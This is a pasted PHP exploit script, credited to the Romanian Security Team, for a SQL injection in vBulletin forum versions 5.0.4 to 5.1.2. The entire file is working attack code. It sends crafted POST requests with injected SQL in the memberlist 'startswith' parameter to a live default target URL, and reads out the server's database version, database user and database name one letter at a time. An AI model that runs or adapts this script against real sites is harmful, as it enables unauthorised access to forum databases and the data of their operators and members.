SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | ||
| 3 | /* | |
| 4 | Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video) | |
| 5 | http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html | |
| 6 | Author: Nytro | |
| 7 | Powered by: Romanian Security Team | |
| 8 | Price: Free. Educational. | |
| 9 | */ | |
| 10 | ||
| 11 | ||
| 12 | error_reporting(E_ALL); | |
| 13 | ini_set('display_errors', 1);
| |
| 14 | ||
| 15 | ||
| 16 | // Get arguments | |
| 17 | ||
| 18 | ||
| 19 | $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; | |
| 20 | $expression = str_replace('/', '\\/', $target_url);
| |
| 21 | ||
| 22 | ||
| 23 | // Function to send a POST request | |
| 24 | ||
| 25 | ||
| 26 | function httpPost($url,$params) | |
| 27 | {
| |
| 28 | $ch = curl_init($url); | |
| 29 | ||
| 30 | ||
| 31 | curl_setopt($ch, CURLOPT_URL,$url); | |
| 32 | curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); | |
| 33 | curl_setopt($ch, CURLOPT_HEADER, false); | |
| 34 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 35 | curl_setopt($ch, CURLOPT_POST, 1); | |
| 36 | curl_setopt($ch, CURLOPT_POSTFIELDS, $params); | |
| 37 | ||
| 38 | curl_setopt($ch, CURLOPT_HTTPHEADER, array( | |
| 39 | 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', | |
| 40 | 'Accept: application/json, text/javascript, */*; q=0.01', | |
| 41 | 'X-Requested-With: XMLHttpRequest', | |
| 42 | 'Referer: https://rstforums.com/v5/memberlist', | |
| 43 | 'Accept-Language: en-US,en;q=0.5', | |
| 44 | 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' | |
| 45 | )); | |
| 46 | ||
| 47 | ||
| 48 | $output = curl_exec($ch); | |
| 49 | ||
| 50 | if($output == FALSE) print htmlspecialchars(curl_error($ch)); | |
| 51 | ||
| 52 | ||
| 53 | curl_close($ch); | |
| 54 | return $output; | |
| 55 | } | |
| 56 | ||
| 57 | ||
| 58 | // Function to get string between two other strings | |
| 59 | ||
| 60 | ||
| 61 | function get_string_between($string, $start, $end) | |
| 62 | {
| |
| 63 | $string = " ".$string; | |
| 64 | $ini = strpos($string,$start); | |
| 65 | if ($ini == 0) return ""; | |
| 66 | $ini += strlen($start); | |
| 67 | $len = strpos($string,$end,$ini) - $ini; | |
| 68 | return substr($string,$ini,$len); | |
| 69 | } | |
| 70 | ||
| 71 | ||
| 72 | // Get version | |
| 73 | ||
| 74 | ||
| 75 | print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; | |
| 76 | print "Version: "; | |
| 77 | ||
| 78 | ||
| 79 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 80 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' . | |
| 81 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 82 | ||
| 83 | ||
| 84 | $letter = 1; | |
| 85 | ||
| 86 | ||
| 87 | while(strpos($result, 'No Users Matched Your Query') == false) | |
| 88 | {
| |
| 89 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
| |
| 90 | ||
| 91 | ||
| 92 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
| 93 | print $username[0]; | |
| 94 | ||
| 95 | $letter++; | |
| 96 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 97 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' . | |
| 98 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 99 | } | |
| 100 | ||
| 101 | ||
| 102 | // Get user | |
| 103 | ||
| 104 | ||
| 105 | print "\r\nUser: "; | |
| 106 | ||
| 107 | ||
| 108 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 109 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' . | |
| 110 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 111 | ||
| 112 | ||
| 113 | $letter = 1; | |
| 114 | ||
| 115 | ||
| 116 | while(strpos($result, 'No Users Matched Your Query') == false) | |
| 117 | {
| |
| 118 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
| |
| 119 | ||
| 120 | ||
| 121 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
| 122 | print $username[0]; | |
| 123 | ||
| 124 | ||
| 125 | $letter++; | |
| 126 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 127 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . | |
| 128 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 129 | } | |
| 130 | ||
| 131 | ||
| 132 | // Get database | |
| 133 | ||
| 134 | ||
| 135 | print "\r\nDatabse: "; | |
| 136 | ||
| 137 | ||
| 138 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 139 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' . | |
| 140 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 141 | ||
| 142 | ||
| 143 | $letter = 1; | |
| 144 | ||
| 145 | ||
| 146 | while(strpos($result, 'No Users Matched Your Query') == false) | |
| 147 | {
| |
| 148 | $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
| |
| 149 | ||
| 150 | ||
| 151 | $username = get_string_between($exploded[1], '">', '<\/a>'); | |
| 152 | print $username[0]; | |
| 153 | ||
| 154 | ||
| 155 | $letter++; | |
| 156 | $result = httpPost($target_url . '/ajax/render/memberlist_items', | |
| 157 | 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' . | |
| 158 | '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); | |
| 159 | } | |
| 160 | ||
| 161 | ||
| 162 | print "\r\n" | |
| 163 | ||
| 164 | ||
| 165 | ?> |
